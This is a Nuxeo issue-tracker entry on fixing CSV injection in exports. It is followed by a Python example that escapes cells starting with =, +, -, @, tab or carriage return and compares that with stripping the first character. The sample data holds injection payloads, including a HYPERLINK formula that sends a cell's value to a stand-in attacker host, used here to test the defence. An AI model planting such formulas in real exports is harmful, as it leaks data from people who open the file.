Nuxeo Platform / NXP-30590

Escape/sanitize the first malicious character of a cell in a CSV export to avoid CSV injection

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 10.10
    • Fix Version/s: 10.10-HF54, 2021.10
    • Component/s: CSV, Security
    • Release Notes Summary:
      The first malicious character of a cell in a CSV export is sanitized to avoid CSV injection.
    • Backlog priority:
      750
    • Sprint:
      nxplatform #45

      Description

      Following https://owasp.org/www-community/attacks/CSV_Injection, Nuxeo should escape (or remove) the first character when a cell starts with:

      • Equals (=)
      • Plus (+)
      • Minus (-)
      • At (@)
      • Tab (0x09)
      • Carriage return (0x0D)
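The following Python is an added example and is not Nuxeo's code nor part of this issue. It applies the OWASP-recommended handling (prefix a single quote, wrap every field in double quotes, double embedded quotes) to the six leading characters listed above, puts the literal "remove the first character" option next to it to show why that is the weaker choice, and parses the export back to confirm no cell still begins with a trigger. The rows, payloads and the names `sanitize_cell`, `strip_first_char`, `export_csv` and `all_cells_safe` are constructed for this example.

```python
import csv
import io
from typing import Callable, Iterable, List

# Leading characters that make a spreadsheet evaluate the cell as a formula
# (the list from the issue description and the OWASP CSV Injection page).
FORMULA_TRIGGERS = frozenset("=+-@\t\r")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    return bool(value) and value[0] in FORMULA_TRIGGERS


def sanitize_cell(value: str) -> str:
    """OWASP-style escape: keep the data, prefix a single quote.

    The apostrophe makes the spreadsheet treat the cell as text, so the
    original content (including a legitimate leading '-' or '+') survives.
    One prefix is enough: the first character is now "'", which is not a
    trigger, whatever follows it.
    """
    return "'" + value if is_formula_cell(value) else value


def strip_first_char(value: str) -> str:
    """The 'remove the first character' option from the issue, taken literally.

    Shown as the weaker choice: it corrupts data such as "-12.50" and is
    bypassed by doubling the trigger ("==1+1" becomes "=1+1").
    """
    return value[1:] if is_formula_cell(value) else value


def export_csv(rows: Iterable[Iterable[object]],
               sanitize: Callable[[str], str] = sanitize_cell) -> str:
    """Serialise rows to CSV, passing every cell through `sanitize`.

    QUOTE_ALL wraps each field in double quotes and doubles any embedded
    double quote, the other two steps OWASP recommends alongside the prefix.
    Passing `sanitize=lambda v: v` reproduces the pre-fix (vulnerable) export.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize(str(cell)) for cell in row])
    return buf.getvalue()


def all_cells_safe(csv_text: str) -> bool:
    """Parse an export back and confirm no cell starts with a trigger."""
    reader = csv.reader(io.StringIO(csv_text))
    return all(not is_formula_cell(cell) for row in reader for cell in row)


# Constructed sample export: hostile cells, a doubled trigger that defeats
# plain stripping, and a legitimate negative number that must survive.
SAMPLE_ROWS: List[List[object]] = [
    ["title", "author", "balance"],
    ['=HYPERLINK("http://attacker.example/?x="&A1,"open")', "mallory", "-12.50"],
    ["@SUM(1+1)", "eve", "+100"],
    ["==1+1", "trent", 7],
    ["Quarterly report", "alice", 42],
]


if __name__ == "__main__":
    vulnerable = export_csv(SAMPLE_ROWS, sanitize=lambda v: v)
    stripped = export_csv(SAMPLE_ROWS, sanitize=strip_first_char)
    escaped = export_csv(SAMPLE_ROWS)
    print(vulnerable)
    print(escaped)
    print("vulnerable safe:", all_cells_safe(vulnerable))
    print("stripped safe:  ", all_cells_safe(stripped))
    print("escaped safe:   ", all_cells_safe(escaped))
```

The apostrophe prefix turns a numeric-looking cell such as "-12.50" into text in the spreadsheet; that is the accepted trade-off of escaping every triggering cell, and the alternative of applying it only to string-typed fields needs type information the CSV layer usually does not have. Stripping, by contrast, silently changes values and has to be repeated until the cell no longer starts with a trigger, which is why the prefix is preferable.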
